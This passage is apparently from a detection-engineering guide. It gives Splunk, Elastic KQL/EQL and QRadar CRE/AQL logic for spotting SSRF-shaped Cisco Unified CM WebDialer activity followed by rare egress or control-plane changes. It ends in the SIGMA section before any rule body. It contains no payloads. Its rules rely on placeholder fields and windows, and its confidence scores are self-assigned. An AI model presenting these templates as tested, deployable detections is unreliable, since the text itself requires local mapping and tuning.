| eval valid_route_plan_object=if(isnotnull(valid_control_change_time), route_plan_object, null())
| eval valid_call_routing_change=if(isnotnull(valid_control_change_time), call_routing_change, null())
| eval valid_change_type=if(isnotnull(valid_control_change_time), change_type, null())
| eventstats min(valid_rare_egress_time) AS first_rare_egress_time values(valid_rare_egress_dest_ip) AS rare_egress_dest_ips values(valid_rare_egress_dest_domain) AS rare_egress_dest_domains values(valid_rare_egress_dest_port) AS rare_egress_dest_ports values(valid_rare_egress_event_type) AS rare_egress_event_types values(valid_rare_egress_reputation) AS rare_egress_reputations by cucm_scope
| eventstats min(valid_control_change_time) AS first_control_change_time values(valid_control_event_type) AS control_event_types values(valid_administrator) AS administrators values(valid_management_host) AS management_hosts values(valid_service_name) AS service_names values(valid_service_action) AS service_actions values(valid_file_path) AS file_paths values(valid_file_action) AS file_actions values(valid_route_plan_object) AS route_plan_objects values(valid_call_routing_change) AS call_routing_changes values(valid_change_type) AS change_types by cucm_scope
| where isnotnull(first_rare_egress_time) OR isnotnull(first_control_change_time)
| eval time_to_rare_egress=first_rare_egress_time-first_webdialer_time
| eval time_to_control_change=first_control_change_time-first_webdialer_time
| eval has_rare_egress=if(isnotnull(first_rare_egress_time), 1, 0)
| eval has_control_plane_change=if(isnotnull(first_control_change_time), 1, 0)
| eval correlated_path_count=has_rare_egress+has_control_plane_change
| eval confidence=case(correlated_path_count>=2, "High", correlated_path_count=1, "Medium to High", true(), "Medium")
| eval severity=case(correlated_path_count>=2, "critical", has_control_plane_change=1, "high", has_rare_egress=1, "high", true(), "medium")
| eval detection_outcome=case(correlated_path_count>=2, "Suspicious Cisco Unified CM WebDialer activity followed by rare egress and voice-control-plane change", has_control_plane_change=1, "Suspicious Cisco Unified CM WebDialer activity followed by voice-control-plane change", has_rare_egress=1, "Suspicious Cisco Unified CM WebDialer activity followed by rare egress", true(), "Suspicious Cisco Unified CM WebDialer activity")
| stats values(webdialer_event_types) AS webdialer_event_types values(webdialer_paths) AS webdialer_paths values(webdialer_queries) AS webdialer_queries values(webdialer_urls) AS webdialer_urls values(webdialer_sources) AS webdialer_sources values(forwarded_webdialer_sources) AS forwarded_webdialer_sources values(webdialer_source_asns) AS webdialer_source_asns values(webdialer_source_geos) AS webdialer_source_geos values(ssrf_request_indicators) AS ssrf_request_indicators values(webdialer_source_risks) AS webdialer_source_risks values(webdialer_reputation_risks) AS webdialer_reputation_risks values(rare_egress_dest_ips) AS rare_egress_dest_ips values(rare_egress_dest_domains) AS rare_egress_dest_domains values(rare_egress_dest_ports) AS rare_egress_dest_ports values(rare_egress_event_types) AS rare_egress_event_types values(rare_egress_reputations) AS rare_egress_reputations values(control_event_types) AS control_event_types values(administrators) AS administrators values(management_hosts) AS management_hosts values(service_names) AS service_names values(service_actions) AS service_actions values(file_paths) AS file_paths values(file_actions) AS file_actions values(route_plan_objects) AS route_plan_objects values(call_routing_changes) AS call_routing_changes values(change_types) AS change_types min(first_webdialer_time) AS first_webdialer_time min(first_rare_egress_time) AS first_rare_egress_time min(first_control_change_time) AS first_control_change_time max(time_to_rare_egress) AS time_to_rare_egress max(time_to_control_change) AS time_to_control_change max(correlated_path_count) AS correlated_path_count values(detection_outcome) AS detection_outcome values(confidence) AS confidence values(severity) AS severity by cucm_scope
| table first_webdialer_time, first_rare_egress_time, first_control_change_time, time_to_rare_egress, time_to_control_change, cucm_scope, correlated_path_count, severity, confidence, webdialer_event_types, webdialer_paths, webdialer_queries, webdialer_urls, webdialer_sources, forwarded_webdialer_sources, webdialer_source_asns, webdialer_source_geos, ssrf_request_indicators, webdialer_source_risks, webdialer_reputation_risks, rare_egress_dest_ips, rare_egress_dest_domains, rare_egress_dest_ports, rare_egress_event_types, rare_egress_reputations, control_event_types, administrators, management_hosts, service_names, service_actions, file_paths, file_actions, route_plan_objects, call_routing_changes, change_types, detection_outcome

Elastic

Detection Viability Assessment

Production-ready as an Elastic transform-backed KQL and EQL correlation pattern where Cisco Unified CM / Unified CM SME WebDialer activity, Cisco Unified CM asset inventory, WebDialer enablement state, approved-source context, source reputation, rare egress context, administrative audit telemetry, service-state telemetry, file-integrity telemetry, and route-plan change telemetry can be normalized into ECS-aligned candidate data streams.

This rule should not be deployed as broad raw cross-index correlation over high-volume proxy, firewall, DNS, web, endpoint, and administrative telemetry. Production deployment should use transforms, enrichment policies, value lists, exception lists, and candidate indices that pre-stage suspicious WebDialer activity, rare Unified CM egress, and voice-control-plane change candidates. The final EQL sequences should operate over reduced candidate data and correlate by a stable Cisco Unified CM scope field.

Rule

Cisco Unified CM WebDialer SSRF Candidate Followed by Rare Egress or Voice-Control-Plane Change

Rule Format

Elastic transform-backed KQL and EQL correlation pattern requiring local ECS field mapping, data-view validation, transform validation, enrichment-policy validation, value-list validation, exception-list validation, threshold validation, timing-window tuning, and environment-specific allowlisting before production deployment.

Detection Purpose

Detect suspicious Cisco Unified CM / Unified CM SME WebDialer activity that aligns with SSRF-shaped request behavior and is followed by rare outbound communication, administrative change, service manipulation, file activity, route-plan change, call-routing change, abnormal management access, or voice-control-plane instability tied to the same Cisco Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, or voice-management scope.

Detection Logic

Trigger when transform-backed WebDialer candidate data identifies suspicious WebDialer activity against a Cisco Unified CM or Unified CM SME asset with WebDialer enabled, especially when the request includes abnormal WebDialer paths, unapproved source context, SSRF-shaped parameter indicators, backend fetch behavior, abnormal response transitions, failure-to-success patterns, or source reputation risk.

Assign medium severity when suspicious WebDialer activity occurs against a Unified CM or Unified CM SME asset outside approved WebDialer workflows, monitoring, provider support, vulnerability scanning, patch validation, or maintenance.

Assign high severity when suspicious WebDialer activity is followed within the local rare-egress correlation window by rare outbound communication from the same Unified CM node, Unified CM SME node, backend host, management interface, NAT egress identity, or voice-management segment.

Assign high severity when suspicious WebDialer activity is followed within the local control-plane correlation window by administrative configuration change, service restart, file creation, file modification, route-plan change, call-routing change, abnormal management login, unusual cluster communication, voice-service instability, or unexpected shell activity tied to the same Unified CM node, cluster, backend host, management subnet, administrative identity, or voice-management scope.

Promote to critical when suspicious WebDialer activity converges with rare egress and control-plane change, or when correlated telemetry confirms appliance-side compromise evidence, unauthorized administrator creation, malicious route-plan change, service manipulation, file-write activity, command execution, voice-control-plane instability, or call-routing integrity impact.

Required Telemetry

Elastic transform-backed Cisco Unified CM WebDialer suspicious activity candidate data stream.

Elastic transform-backed Cisco Unified CM rare egress candidate data stream.

Elastic transform-backed Cisco Unified CM control-plane change candidate data stream.

WAF logs.

Reverse-proxy logs.

Load-balancer logs.

Firewall logs.

Proxy logs.

DNS logs.

Cisco Unified CM or Unified CM SME access logs where available.

Cisco Unified CM administrative audit logs where available.

Cisco Unified CM service-status or service-restart telemetry where available.

Cisco Unified CM configuration-change telemetry where available.

Cisco Unified CM route-plan change telemetry where available.

Cisco Unified CM file-integrity telemetry where available.

Cisco Unified CM appliance inventory.

Cisco Unified CM SME appliance inventory.

Cisco Unified CM cluster and node inventory.

Cisco WebDialer enablement inventory.

Elastic ECS-aligned source, destination, host, url, http, user, event, rule, file, process, and network fields where available.

Elastic enrichment fields for Cisco Unified CM asset role, WebDialer enablement, approved source status, approved administrator status, approved change status, source reputation, destination reputation, and voice-management scope.

Elastic value lists for approved WebDialer sources, approved administrators, approved provider-managed sources, approved scanner sources, approved monitoring sources, approved patch-validation sources, approved egress destinations, approved route-plan changes, approved service restarts, approved maintenance windows, and approved emergency remediation.

Engineering Implementation Instructions

Create transform-backed candidate data streams for suspicious WebDialer activity, rare Cisco Unified CM egress, and Cisco Unified CM control-plane change before enabling the final EQL sequence rule.

Map source IP, forwarded source IP, normalized source IP, destination host, destination IP, backend host, backend IP, virtual host, URI path, query string, full URL, HTTP method, HTTP status code, request size, response size, user agent, WebDialer endpoint category, SSRF parameter indicator, source reputation, destination reputation, DNS query, proxy action, firewall action, NAT egress identity, Cisco Unified CM node, Cisco Unified CM SME node, Cisco Unified CM cluster, voice-management segment, administrator, administrative action, service name, service action, file path, file action, route-plan object, call-routing change, and event timestamp fields to ECS or customer-local enrichment fields.

Create a stable labels.cucm_scope enrichment field that resolves to the best available shared identity across Cisco Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, or voice-management segment.

Use Elastic transforms or ingest pipelines to populate candidate labels such as labels.is_cucm_asset, labels.webdialer_enabled, labels.webdialer_suspicious, labels.webdialer_event_type, labels.ssrf_request_indicator, labels.webdialer_source_risk, labels.webdialer_reputation_risk, labels.is_rare_cucm_egress, labels.rare_egress_event_type, labels.is_approved_egress_destination, labels.destination_reputation, labels.is_cucm_control_plane_change, labels.control_event_type, labels.is_approved_change, labels.is_approved_change_type, and labels.cucm_scope.

Use enrichment policies and value lists to identify Cisco Unified CM assets, Unified CM SME assets, WebDialer-enabled assets, voice-management segments, approved WebDialer sources, approved call-management integrations, approved administrators, approved monitoring sources, approved scanners, approved provider-managed sources, approved patch-validation sources, approved maintenance windows, approved egress destinations, approved route-plan changes, approved service restarts, approved backup jobs, and approved emergency remediation.

Use the KQL blocks as transform or candidate-filter logic. Use the EQL sequences as the final correlation logic. Do not deploy the KQL candidate filters and EQL correlation sequences as a single mixed-language rule without adapting them to the customer’s Elastic rule type.

Avoid broad raw cross-index EQL over unbounded WAF, proxy, firewall, DNS, endpoint, and administrative data. Use transform-backed candidate indices, bounded maxspan windows, ECS-compatible mappings, enrichment fields, value lists, and exception lists.

Run in hunt mode before alert mode to baseline approved WebDialer use, click-to-call workflows, monitoring activity, scanner activity, provider-managed access, patch validation, maintenance activity, call-management integrations, directory integration, backup activity, route-plan changes, cluster communication, and expected voice-platform egress.

Treat ECS mapping, local field aliases, transform freshness, enrichment-policy quality, value-list coverage, exception-list quality, timing-window tuning, false-positive testing, and SOC triage output fields as required local deployment work.

DRI Assessment

High resilience where WebDialer activity, Cisco Unified CM asset inventory, WebDialer enablement inventory, source reputation, rare egress baselines, administrative audit telemetry, service-state telemetry, file-integrity telemetry, and route-plan change telemetry are normalized into transform-backed candidate data streams. Resilience is lower where WebDialer URI visibility, Unified CM administrative telemetry, transform freshness, or stable Unified CM scope mapping is unavailable.

DRI

8.6 / 10

TCR Assessment

Operational confidence is moderate for standalone suspicious WebDialer activity and high when transform-backed WebDialer candidates correlate with rare egress, administrative change, file modification, service restart, route-plan change, call-routing change, abnormal management login, voice-service instability, or confirmed appliance-side compromise indicators.

Operational TCR

8.3 / 10

Full-Telemetry TCR

9.2 / 10

Limitations

This rule depends on transform quality, ECS/local field mapping, URI-preserving WebDialer telemetry, Unified CM asset inventory, stable correlation scope, and local exception-list freshness. Encrypted traffic without HTTP metadata, missing WebDialer logs, incomplete administrative audit telemetry, stale asset inventory, unreliable NAT/backend mapping, or stale transforms may reduce confidence. Legitimate click-to-call workflows, provider support, vulnerability scanning, patch validation, backup operations, certificate management, route-plan changes, service restarts, cluster maintenance, and emergency remediation may produce similar activity and must be tuned before alert-mode deployment.

Detection Query Pattern

Elastic transform-backed KQL and EQL pattern for Cisco Unified CM / Unified CM SME WebDialer SSRF-shaped activity followed by rare egress or voice-control-plane change. Configure Elastic rule data views to include transform-backed WebDialer suspicious activity, rare Unified CM egress, and Unified CM control-plane change candidate data streams. Local ECS field, value-list, enrichment-policy, exception-list, transform, threshold, and timing-window validation are required before production deployment.

KQL transform filter for suspicious WebDialer candidates.

labels.is_cucm_asset : true
and labels.webdialer_enabled : true
and labels.cucm_scope : *
and (
labels.webdialer_suspicious : true or
labels.webdialer_event_type : (
"abnormal_webdialer_access" or
"webdialer_request_from_unapproved_source" or
"webdialer_access_outside_click_to_call_workflow" or
"webdialer_backend_fetch_behavior" or
"webdialer_response_anomaly" or
"webdialer_failure_to_success_pattern" or
"suspicious_source_to_voice_management_plane"
) or
labels.ssrf_request_indicator : true or
labels.webdialer_source_risk : true or
labels.webdialer_reputation_risk : true
)
and not labels.is_approved_change : true

KQL transform filter for rare Unified CM egress candidates.

labels.is_cucm_asset : true
and labels.cucm_scope : *
and labels.is_rare_cucm_egress : true
and (
labels.rare_egress_event_type : (
"rare_outbound_connection" or
"unexpected_external_egress" or
"unexpected_dns_resolution" or
"connection_to_unapproved_destination" or
"connection_to_unknown_reputation_destination" or
"connection_to_suspicious_reputation_destination" or
"egress_not_in_voice_platform_baseline"
) or
labels.destination_reputation : (
"unknown" or
"suspicious" or
"malicious"
)
)
and not labels.is_approved_change : true
and not labels.is_approved_egress_destination : true

KQL transform filter for Cisco Unified CM control-plane change candidates.

labels.is_cucm_asset : true
and labels.cucm_scope : *
and labels.is_cucm_control_plane_change : true
and labels.control_event_type : (
"cucm_file_created" or
"cucm_file_modified" or
"cucm_service_restart" or
"cucm_administrative_configuration_change" or
"cucm_route_plan_change" or
"cucm_call_routing_change" or
"new_cucm_administrator_created" or
"cucm_administrator_modified" or
"management_login_from_new_source" or
"unusual_cluster_communication" or
"voice_service_instability" or
"unexpected_shell_activity"
)
and not labels.is_approved_change : true
and not labels.is_approved_change_type : true

EQL sequence for suspicious WebDialer activity followed by rare Unified CM egress.

sequence by labels.cucm_scope with maxspan=ENV_CUCM_RARE_EGRESS_WINDOW
[any where labels.is_cucm_asset == true and labels.webdialer_enabled == true and labels.cucm_scope != null and (
labels.webdialer_suspicious == true or
labels.webdialer_event_type in ("abnormal_webdialer_access", "webdialer_request_from_unapproved_source", "webdialer_access_outside_click_to_call_workflow", "webdialer_backend_fetch_behavior", "webdialer_response_anomaly", "webdialer_failure_to_success_pattern", "suspicious_source_to_voice_management_plane") or
labels.ssrf_request_indicator == true or
labels.webdialer_source_risk == true or
labels.webdialer_reputation_risk == true
) and labels.is_approved_change != true]
[any where labels.is_cucm_asset == true and labels.cucm_scope != null and labels.is_rare_cucm_egress == true and labels.is_approved_egress_destination != true and labels.is_approved_change != true]

EQL sequence for suspicious WebDialer activity followed by Cisco Unified CM control-plane change.

sequence by labels.cucm_scope with maxspan=ENV_CUCM_CONTROL_PLANE_CHANGE_WINDOW
[any where labels.is_cucm_asset == true and labels.webdialer_enabled == true and labels.cucm_scope != null and (
labels.webdialer_suspicious == true or
labels.webdialer_event_type in ("abnormal_webdialer_access", "webdialer_request_from_unapproved_source", "webdialer_access_outside_click_to_call_workflow", "webdialer_backend_fetch_behavior", "webdialer_response_anomaly", "webdialer_failure_to_success_pattern", "suspicious_source_to_voice_management_plane") or
labels.ssrf_request_indicator == true or
labels.webdialer_source_risk == true or
labels.webdialer_reputation_risk == true
) and labels.is_approved_change != true]
[any where labels.is_cucm_asset == true and labels.cucm_scope != null and labels.is_cucm_control_plane_change == true and labels.is_approved_change != true and labels.is_approved_change_type != true]

QRadar

Detection Viability Assessment

Production-ready as a QRadar CRE correlation rule where Cisco Unified CM / Unified CM SME WebDialer activity, Cisco Unified CM asset inventory, WebDialer enablement state, source reputation, approved-source context, rare egress context, administrative audit telemetry, service-state telemetry, file-integrity telemetry, route-plan change telemetry, and voice-control-plane change telemetry can be parsed into DSM fields, custom properties, reference sets, reference maps, and building blocks.

The CRE rule is the production detection authority. Supporting AQL should be used only for hunt, validation, tuning, and offense investigation. Do not rely on broad AQL correlation as the primary production control when QRadar building blocks, reference sets, reference maps, offense rules, and bounded CRE correlation are available.

Rule

Cisco Unified CM WebDialer SSRF Candidate Followed by Rare Egress or Voice-Control-Plane Change

Rule Format

QRadar CRE rule and building-block correlation pattern with bounded supporting AQL hunt logic requiring local log-source validation, DSM validation, custom-property validation, reference-set validation, reference-map validation, offense-rule validation, timing-window tuning, and environment-specific allowlisting before production deployment.

Detection Purpose

Detect suspicious Cisco Unified CM / Unified CM SME WebDialer activity that aligns with SSRF-shaped request behavior and is followed by rare outbound communication, administrative change, service manipulation, file activity, route-plan change, call-routing change, abnormal management access, or voice-control-plane instability tied to the same Cisco Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, administrator, or voice-management scope.

Detection Logic

Trigger when QRadar observes suspicious WebDialer activity against a Cisco Unified CM or Unified CM SME asset with WebDialer enabled, especially when the request includes abnormal WebDialer paths, unapproved source context, SSRF-shaped parameter indicators, backend fetch behavior, abnormal response transitions, failure-to-success patterns, suspicious source reputation, or activity outside approved WebDialer workflows.

Assign medium severity when suspicious WebDialer activity occurs against a Unified CM or Unified CM SME asset outside approved WebDialer workflows, monitoring, provider support, vulnerability scanning, patch validation, or maintenance.

Assign high severity when suspicious WebDialer activity is followed within the local rare-egress correlation window by rare outbound communication from the same Unified CM node, Unified CM SME node, backend host, management interface, NAT egress identity, or voice-management segment.

Assign high severity when suspicious WebDialer activity is followed within the local control-plane correlation window by administrative configuration change, service restart, file creation, file modification, route-plan change, call-routing change, abnormal management login, unusual cluster communication, voice-service instability, or unexpected shell activity tied to the same Unified CM node, cluster, backend host, management subnet, administrative identity, or voice-management scope.

Promote to critical when suspicious WebDialer activity converges with rare egress and control-plane change, or when correlated telemetry confirms appliance-side compromise evidence, unauthorized administrator creation, malicious route-plan change, service manipulation, file-write activity, command execution, voice-control-plane instability, or call-routing integrity impact.

Required Telemetry

QRadar log sources for WAF activity.

QRadar log sources for reverse-proxy activity.

QRadar log sources for load-balancer activity.

QRadar log sources for firewall activity.

QRadar log sources for proxy activity.

QRadar log sources for DNS activity.

QRadar log sources for Cisco Unified CM or Unified CM SME access logs where available.

QRadar log sources for Cisco Unified CM administrative audit logs where available.

QRadar log sources for Cisco Unified CM service-status or service-restart telemetry where available.

QRadar log sources for Cisco Unified CM configuration-change telemetry where available.

QRadar log sources for Cisco Unified CM route-plan change telemetry where available.

QRadar log sources for Cisco Unified CM file-integrity telemetry where available.

Cisco Unified CM appliance reference set.

Cisco Unified CM SME appliance reference set.

Cisco Unified CM cluster and node reference map.

Cisco WebDialer-enabled asset reference set.

Approved WebDialer source reference set.

Approved voice administrator source reference set.

Approved call-management integration reference set.

Approved monitoring source reference set.

Approved scanner source reference set.

Approved provider-managed source reference set.

Approved patch-validation source reference set.

Approved maintenance-window reference set or reference map.

Approved Cisco Unified CM egress destination reference set.

Approved route-plan change reference set or reference map.

Approved service-restart reference set or reference map.

Source reputation enrichment.

Destination reputation enrichment.

Recently seen destination-domain and destination-IP baseline.

QRadar custom properties for Cisco Unified CM scope, Cisco Unified CM node, Cisco Unified CM cluster, voice-management segment, WebDialer event type, SSRF request indicator, rare egress event type, control-plane event type, approved-change context, administrator, service action, file action, route-plan object, and call-routing change.

Engineering Implementation Instructions

Create QRadar building blocks for Cisco Unified CM asset identification, WebDialer-enabled assets, suspicious WebDialer activity, rare Cisco Unified CM egress, Cisco Unified CM control-plane change, approved maintenance context, approved WebDialer workflow context, approved provider-managed access, approved vulnerability scanning, approved patch validation, approved route-plan change, approved service restart, approved egress destination, approved incident response, and suspicious voice-control-plane change context.

Create custom properties for Cisco Unified CM scope, Cisco Unified CM node, Cisco Unified CM SME node, Cisco Unified CM cluster, backend host, management interface, NAT egress identity, voice-management segment, WebDialer endpoint category, WebDialer event type, SSRF request indicator, source reputation, destination reputation, egress event type, administrative action, service action, file action, route-plan object, call-routing change, and control-plane event type.

Normalize Cisco Unified CM correlation identity into a stable custom property such as Cisco Unified CM Scope. This field should resolve to the best available shared scope across Cisco Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, or voice-management segment.

Use reference sets and reference maps for Cisco Unified CM assets, Unified CM SME assets, WebDialer-enabled assets, approved WebDialer sources, approved administrators, approved call-management integrations, approved monitoring systems, approved vulnerability scanners, approved provider-managed sources, approved patch-validation sources, approved maintenance windows, approved egress destinations, approved route-plan changes, approved service restarts, approved backup jobs, approved emergency remediation, and recently seen egress destinations.

Use QRadar CRE correlation as the production detection authority. Use AQL only as bounded supporting hunt and validation logic to confirm candidate event parsing, custom-property extraction, building-block membership, reference-set coverage, reference-map coverage, and offense context.

Avoid broad production AQL logic over high-volume WAF, proxy, firewall, DNS, endpoint, and administrative events. Use DSM parsing, custom properties, building blocks, reference sets, reference maps, offense rules, and bounded CRE time windows.

Validate that the CRE rule correlates by the same Cisco Unified CM scope, related Unified CM asset, related cluster, related management host, NAT egress identity, voice-management segment, or administrator where locally available. Do not correlate unrelated WebDialer activity and unrelated voice-control-plane changes only because they occur within the same time range.

Run in monitor mode before alert mode to baseline approved WebDialer use, click-to-call workflows, monitoring activity, scanner activity, provider-managed access, patch validation, maintenance activity, call-management integrations, directory integration, backup activity, route-plan changes, cluster communication, and expected voice-platform egress.

Treat DSM validation, custom-property extraction, reference-set freshness, reference-map completeness, building-block quality, offense-rule grouping, timing-window tuning, false-positive testing, and SOC triage output fields as required local deployment work.

DRI Assessment

High resilience where WebDialer activity, Cisco Unified CM asset inventory, WebDialer enablement inventory, source reputation, rare egress baselines, administrative audit telemetry, service-state telemetry, file-integrity telemetry, route-plan change telemetry, and voice-control-plane change telemetry are parsed into reliable QRadar custom properties and building blocks. Resilience is lower where WebDialer URI visibility, Unified CM administrative telemetry, DSM parsing quality, or stable Unified CM scope mapping is unavailable.

DRI

8.5 / 10

TCR Assessment

Operational confidence is moderate for standalone suspicious WebDialer activity and high when QRadar building blocks correlate WebDialer candidates with rare egress, administrative change, file modification, service restart, route-plan change, call-routing change, abnormal management login, voice-service instability, or confirmed appliance-side compromise indicators.

Operational TCR

8.2 / 10

Full-Telemetry TCR

9.1 / 10

Limitations

This rule depends on QRadar DSM quality, custom-property extraction, Cisco Unified CM asset inventory, URI-preserving WebDialer telemetry, stable Cisco Unified CM scope mapping, and local reference-set freshness. Encrypted traffic without HTTP metadata, missing WebDialer logs, incomplete administrative audit telemetry, stale asset inventory, unreliable NAT/backend mapping, or missing custom properties may reduce confidence. Legitimate click-to-call workflows, provider support, vulnerability scanning, patch validation, backup operations, certificate management, route-plan changes, service restarts, cluster maintenance, and emergency remediation may produce similar activity and must be tuned before alert-mode deployment.

Detection Query Pattern

QRadar production CRE logic for Cisco Unified CM / Unified CM SME WebDialer SSRF-shaped activity followed by rare egress or voice-control-plane change, followed by bounded supporting AQL hunt logic. The CRE logic is the production detection authority. The AQL block is supporting hunt and validation logic only and requires local log-source, DSM, custom-property, reference-set, reference-map, building-block, offense-rule, and timing-window validation before operational use.

WHEN event matches BB:Cisco Unified CM WebDialer Suspicious Activity
AND event matches BB:Cisco Unified CM Asset With WebDialer Enabled
AND event does NOT match BB:Approved Cisco Unified CM WebDialer Workflow
AND event does NOT match BB:Approved Cisco Unified CM Maintenance Or Provider Support
AND within ENV_CUCM_RARE_EGRESS_WINDOW the same Cisco Unified CM scope, related Cisco Unified CM node, related cluster, related management interface, NAT egress identity, or voice-management segment matches BB:Rare Cisco Unified CM Egress
AND rare egress event does NOT match BB:Approved Cisco Unified CM Egress Destination
AND rare egress event does NOT match BB:Approved Cisco Unified CM Maintenance Or Incident Response
THEN create or contribute to offense Cisco Unified CM WebDialer Activity Followed By Rare Egress.

WHEN event matches BB:Cisco Unified CM WebDialer Suspicious Activity
AND event matches BB:Cisco Unified CM Asset With WebDialer Enabled
AND event does NOT match BB:Approved Cisco Unified CM WebDialer Workflow
AND event does NOT match BB:Approved Cisco Unified CM Maintenance Or Provider Support
AND within ENV_CUCM_CONTROL_PLANE_CHANGE_WINDOW the same Cisco Unified CM scope, related Cisco Unified CM node, related cluster, related management interface, related administrator, or voice-management segment matches BB:Cisco Unified CM Control-Plane Change
AND control-plane event does NOT match BB:Approved Cisco Unified CM Change
AND control-plane event does NOT match BB:Approved Cisco Unified CM Maintenance Or Incident Response
AND control-plane event matches BB:Suspicious Cisco Unified CM Control-Plane Change Context
THEN create or contribute to offense Cisco Unified CM WebDialer Activity Followed By Control-Plane Change.

WHEN offense contains BB:Cisco Unified CM WebDialer Suspicious Activity
AND offense contains BB:Rare Cisco Unified CM Egress
AND offense contains BB:Cisco Unified CM Control-Plane Change
AND offense does NOT contain BB:Approved Cisco Unified CM Maintenance Or Incident Response
THEN increase offense severity and credibility for Cisco Unified CM WebDialer Activity With Rare Egress And Control-Plane Change.

SELECT
DATEFORMAT(starttime, 'YYYY-MM-dd HH:mm:ss') AS event_time,
sourceip,
destinationip,
"Cisco Unified CM Scope" AS cucm_scope,
"Cisco Unified CM Node" AS cucm_node,
"Cisco Unified CM Cluster" AS cucm_cluster,
"Voice Management Segment" AS voice_management_segment,
"WebDialer Event Type" AS webdialer_event_type,
"SSRF Request Indicator" AS ssrf_request_indicator,
"Rare Egress Event Type" AS rare_egress_event_type,
"Control Plane Event Type" AS control_event_type,
"Administrator" AS administrator,
"Service Name" AS service_name,
"Service Action" AS service_action,
"File Path" AS file_path,
"File Action" AS file_action,
"Route Plan Object" AS route_plan_object,
"Call Routing Change" AS call_routing_change,
"Change Context" AS change_context,
QIDNAME(qid) AS event_name,
LOGSOURCENAME(logsourceid) AS log_source
FROM events
WHERE
"Cisco Unified CM Scope" IS NOT NULL
AND (
"Cisco Unified CM WebDialer Suspicious Activity" = 'true'
OR "Rare Cisco Unified CM Egress" = 'true'
OR "Cisco Unified CM Control Plane Change" = 'true'
)
AND NOT (
"Change Context" ILIKE '%approved%'
OR REFERENCESETCONTAINS('REF:Approved Cisco Unified CM WebDialer Sources', sourceip)
OR REFERENCESETCONTAINS('REF:Approved Cisco Unified CM Provider Sources', sourceip)
OR REFERENCESETCONTAINS('REF:Approved Cisco Unified CM Scanner Sources', sourceip)
OR REFERENCESETCONTAINS('REF:Approved Cisco Unified CM Egress Destinations', destinationip)
OR REFERENCESETCONTAINS('REF:Approved Cisco Unified CM Maintenance Sources', sourceip)
)
LAST ENV_CUCM_CORRELATION_LOOKBACK

SIGMA

Detection Viability Assessment

Production-ready as SIGMA event-rule templates for Cisco Unified CM / Unified CM SME WebDialer suspicious activity, rare Unified CM egress, and Unified CM control-plane change indicators where the customer has normalized WAF, reverse-proxy, load-balancer, firewall, proxy, DNS, Cisco Unified CM access logs, administrative audit logs, service-state logs, file-integrity logs, or route-plan change logs into backend fields that can be mapped during SIEM conversion.

SIGMA should not be used to claim native cross-event temporal correlation by itself. Use these rules as backend-convertible event detection templates. The customer’s SIEM, data lake, or detection platform must perform the final correlation between WebDialer suspicious activity and follow-on rare egress or control-plane change using local fields, enrichment, timing windows, and suppression logic.

Rule

Cisco Unified CM WebDialer SSRF Candidate and Follow-On Voice-Control-Plane Activity SIGMA Templates

Rule Format

SIGMA event-rule template set requiring backend conversion, local field mapping, enrichment-field creation, asset-scope validation, exception-list validation, and SIEM-native correlation before production deployment.

Detection Purpose

Detect Cisco Unified CM / Unified CM SME WebDialer suspicious activity, rare Unified CM egress, and Unified CM control-plane change events that can support backend SIEM correlation for possible WebDialer SSRF exploitation, appliance-side compromise, unauthorized administrative change, service manipulation, route-plan change, call-routing change, or voice-control-plane instability.

Detection Logic

Trigger the WebDialer event rule when HTTP telemetry, WAF telemetry, reverse-proxy telemetry, load-balancer telemetry, or Cisco Unified CM access telemetry identifies WebDialer activity against a Cisco Unified CM or Unified CM SME asset with suspicious source context, abnormal WebDialer path context, SSRF-shaped parameter indicators, backend fetch behavior, abnormal response behavior, or failure-to-success request behavior.

Trigger the rare egress event rule when firewall, proxy, DNS, NDR, or endpoint-adjacent telemetry identifies rare or unapproved outbound communication from a Cisco Unified CM node, Unified CM SME node, backend host, NAT egress identity, management interface, or voice-management segment.

Trigger the control-plane change event rule when Cisco Unified CM administrative audit telemetry, service-state telemetry, file-integrity telemetry, route-plan telemetry, call-routing telemetry, endpoint-adjacent telemetry, or management-plane telemetry identifies suspicious administrative change, service restart, file modification, route-plan change, call-routing change, abnormal management login, unusual cluster communication, voice-service instability, or unexpected shell activity.

Assign medium severity to standalone suspicious WebDialer activity outside approved workflows.

Assign high severity when converted backend rules correlate suspicious WebDialer activity with rare Unified CM egress or Unified CM control-plane change within the local correlation window.

Promote to critical when backend correlation shows suspicious WebDialer activity converging with rare egress and control-plane change, or when follow-on telemetry confirms appliance-side compromise evidence, unauthorized administrator creation, malicious route-plan change, service manipulation, file-write activity, command execution, voice-control-plane instability, or call-routing integrity impact.

Required Telemetry

WAF logs.

Reverse-proxy logs.

Load-balancer logs.

Firewall logs.

Proxy logs.

DNS logs.

Cisco Unified CM or Unified CM SME access logs where available.

Cisco Unified CM administrative audit logs where available.

Cisco Unified CM service-status or service-restart telemetry where available.

Cisco Unified CM configuration-change telemetry where available.

Cisco Unified CM route-plan change telemetry where available.

Cisco Unified CM file-integrity telemetry where available.

Cisco Unified CM appliance inventory.

Cisco Unified CM SME appliance inventory.

Cisco Unified CM cluster and node inventory.

Cisco WebDialer enablement inventory.

Normalized destination asset field.

Normalized source IP field.

Normalized forwarded source IP field.

Normalized URI path field.

Normalized query string field.

Normalized full URL field.

Normalized HTTP status field.

Normalized user-agent field.

Normalized event category field.

Normalized event action field.

Normalized file path field.

Normalized service name field.

Normalized administrator field.

Normalized route-plan object field.

Normalized Cisco Unified CM scope field.

Approved WebDialer source enrichment.

Approved administrator enrichment.

Approved maintenance-window enrichment.

Approved provider-managed source enrichment.

Approved scanner source enrichment.

Approved egress destination enrichment.

Approved change-context enrichment.

Source reputation enrichment.

Destination reputation enrichment.

Engineering Implementation Instructions

Map SIGMA fields to the customer’s SIEM fields before deployment. Required mapped fields include destination asset, source IP, forwarded source IP, HTTP method, URI path, query string, full URL, HTTP status, user agent, destination IP, destination domain, destination port, administrator, service name, service action, file path, file action, route-plan object, call-routing change, event category, event action, and Cisco Unified CM scope.

Create local enrichment fields for Cisco Unified CM asset status, Unified CM SME asset status, WebDialer enablement, approved WebDialer source, approved administrator source, approved provider-managed source, approved scanner source, approved monitoring source, approved patch-validation source, approved maintenance context, approved egress destination, approved route-plan change, approved service restart, source reputation, destination reputation, rare destination, and Cisco Unified CM scope.

